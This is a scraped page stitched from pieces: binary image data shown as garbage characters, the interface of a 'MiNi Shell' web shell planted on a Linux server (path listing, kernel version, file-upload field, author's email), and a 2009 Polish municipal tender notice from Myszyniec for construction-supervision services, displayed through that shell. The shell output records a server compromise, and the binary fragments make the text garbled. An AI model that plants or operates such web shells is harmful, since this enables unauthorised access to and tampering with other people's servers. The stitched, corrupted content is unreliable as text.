JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090803/264552-N-2009.html

<p class="kh_header"><b>Myszyniec: Wykonanie usługi nadzoru inwestorskiego dla zadania inwestycyjnego pn. Budowa Regionalnego Centrum Kultury w Myszyńcu.</b><br>
<b>Numer ogłoszenia: 264552 - 2009; data zamieszczenia: 03.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Myszyniec , Plac Wolności 60, 07-430 Myszyniec, woj. mazowieckie, tel. 029 7721141, faks 029 7721141.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi nadzoru inwestorskiego dla zadania inwestycyjnego pn. Budowa Regionalnego Centrum Kultury w Myszyńcu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty podlegające kompleksowemu nadzorowi inwestorskiemu obejmują budowę niżej wymienionych obiektów:
- Karczma-muzeum (segment A)
- Salon wystawowy - 2 szt. (segment B)- 
- Buda jarmarczna - 5 szt. (segment C - typ 1)
- Buda jarmarczna - 2 szt. (segment C- typ 2)
- Toaleta (segment D)
- Scena (segment E)
- Widownia (segment F)
- Budowa chodników (ciągów pieszych z kostki kamiennej brukowej, granitowej  
   grub. 11 cm) - 3 042 m2
- Zieleń
- Przebudowa drogi dojazdowej - nawierzchnia bitumiczna (warstwa wiążąca i ścieralna), chodnika  z kostki kamiennej brukowej, granitowej gr.11 cm- 806 m2, parkingi z kostki kamiennej brukowej, granitowej gr.16 cm - 1662m2
- Obudowa śmietnika
- Wykonanie rzeźby ludowej (para kurpiowska wysok. 2 m)
- System transmisji i rejestracji obrazu (monitoring)
- Oświetlenie zewnętrzne
- Wykonanie instalacji i sieci sanitarnych - Budynek karczmy
- Wykonanie instalacji i sieci sanitarnych - toaleta i scena
- Instalacje elektryczne wewnętrzne.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.31.31.30-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 1000 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego mogą się ubiegać Wykonawcy którzy:
a) posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 Prawa Zamówień Publicznych.

2. Wykonawca ubiegający się o udzielenie zamówienia winien udokumentować, że w ostatnich trzech latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował co najmniej po 1 (jednym) zadaniu - nadzór inwestorski nad:

- obiektem kubaturowym o powierzchni kubaturowej nie mniejszej niż 3 500 m3 , 

- nadzór nad robotą sanitarną (sieć wod-kan. i kotłownia) o wartości nie mniejszej niż 200 000,00 zł (łączna wartość dla sieci wodno - kanaliz. i kotłowni),

- nadzór nad robotą elektryczną o wartości nie mniejszej niż 100 000,00 zł,

- nadzór nad robotą drogową,  obejmującą wykonanie nawierzchni bitumicznej i chodników lub parkingów o wartości nie mniejszej niż 500 000,00 zł.

3. Wykonawca winien udokumentować, że dysponuje osobami zdolnymi do wykonania zamówienia z nie mniej niż trzyletnim doświadczeniem,  posiadającymi uprawnienia do nadzorowania robót w specjalnościach:
- budowlanej bez ograniczeń,
- instalacji sanitarnych  w pełnym zakresie,
- instalacji elektrycznych,
- drogowej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane dokumenty należy przedstawić w formie oryginałów albo kopii.
Dokumenty złożone w formie kserokopii muszą być poświadczone za zgodność z oryginałem przez wykonawcę.
W celu potwierdzenia spełnienia warunków określonych w pkt. 8 SIWZ Wykonawcy muszą dostarczyć następujące dokumenty i oświadczenia:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentu składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje sie je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania . W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot.
Podmioty występujące wspólnie działają poprzez pełnomocnika, który zobowiązany jest do złożenia stosownego dokumentu, potwierdzającego jego umocowanie w tym zakresie (pełnomocnictwa),
- koncesję, zezwolenie lub licencję (jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem) w tych przypadkach gdy wyszczególnione w pkt.9.I.1 wypisy z rejestru nie zawierają uprawnień do wykonywania określonego zamówieniem publicznym rodzaju działalności.
- zaświadczenie właściwego naczelnika Urzędu Skarbowego o braku zaległości podatkowych (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert- oryginał lub kopia z potwierdzeniem za zgodność z oryginałem)
- zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego o braku zaległości (wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert- oryginał lub kopia  z potwierdzeniem za zgodność z oryginałem),
- umowa regulująca współpracę podmiotów występujących wspólnie,
- wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć  w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (załącznik nr 3 do SIWZ),
- kopię uprawnień osób przewidzianych do pełnienia funkcji inspektora nadzoru t.j
  w specjalności:
  - budowlanej bez ograniczeń,
  - instalacji sanitarnych  w pełnym zakresie,
  - instalacji elektrycznych,
  - drogowej.

- aktualne zaświadczenia o wpisaniu na listę członków Izby Inżynierów Budownictwa osób wyszczególnionych w załączniku nr 3 do SIWZ,
- wykaz wykonanych usług w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej  po jednym zadaniu (nadzory inwestorskie) nad:
- obiektem kubaturowym o powierzchni kubaturowej nie mniejszej niż 3 500 m3 , 

- nadzór nad robotą sanitarną (sieć wod-kan. i kotłownia) o wartości nie mniejszej niż 200 000,00 zł (łączna wartość dla sieci wodno - kanaliz. i kotłowni),

- nadzór nad robotą elektryczną o wartości nie mniejszej niż 100 000,00 zł,

- nadzór nad robotą drogową,  obejmującą wykonanie nawierzchni bitumicznej i chodników lub parkingów o wartości nie mniejszej niż 500 000,00 zł.
(załącznik nr 4 do SIWZ). Do wykazu należy dołączyć dokumenty potwierdzające 
(referencje), że usługa została wykonana należycie, wystawione przez bezpośredniego inwestora (odbiorcę robót) lub głównego Wykonawcę w przypadku, gdy Wykonawca ubiegający się o udzielenie zamówienia realizował zadanie, którego dotyczą powyższe dokumenty jako Podwykonawca.
- aktualną informację z Krajowego Rejestru Karnego lub równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby       w zakresie określonym wart. 24 ust. 1 pkt. 4 - 8 ustawy , wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
- podpisane oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust.1 p.z.p. i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 p.z.p.   (załącznik nr 2 do SIWZ)
Oprócz dokumentów wymienionych w pkt. 9 I. wykonawcy muszą złożyć:  
- wypełniony formularz ofertowy ( załącznik nr 1 do SIWZ),
- zaakceptowany wzór umowy ( załącznik nr 6 do SIWZ),
- dowód wniesienia wadium ( zgodnie z pkt. 12 SIWZ),
- jeżeli Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo, określające jego zakres i podpisane przez osoby uprawnione do reprezentowania Wykonawcy. W przypadku złożenia kopii pełnomocnictwa, pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez osoby uprawnione do reprezentowania Wykonawcy. Zamawiający przed podpisaniem umowy zażąda do wglądu oryginału lub notarialnie potwierdzonej kopii pełnomocnictwa,
- w przypadku zlecenia wykonania części robót Podwykonawcom - informację       o Podwykonawcach ( stanowiącą załącznik nr 5do SIWZ) oraz umowę przedwstępną podpisaną przez Wykonawcę i Podwykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://myszyniec.nowoczesnagmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
07-430 Myszyniec
ul. Plac Wolności 60
pokój nr 1, parter.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 09:00, miejsce: Urząd Miejski
07-430 Myszyniec
ul. Plac Wolności 60
pokój nr 7 I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com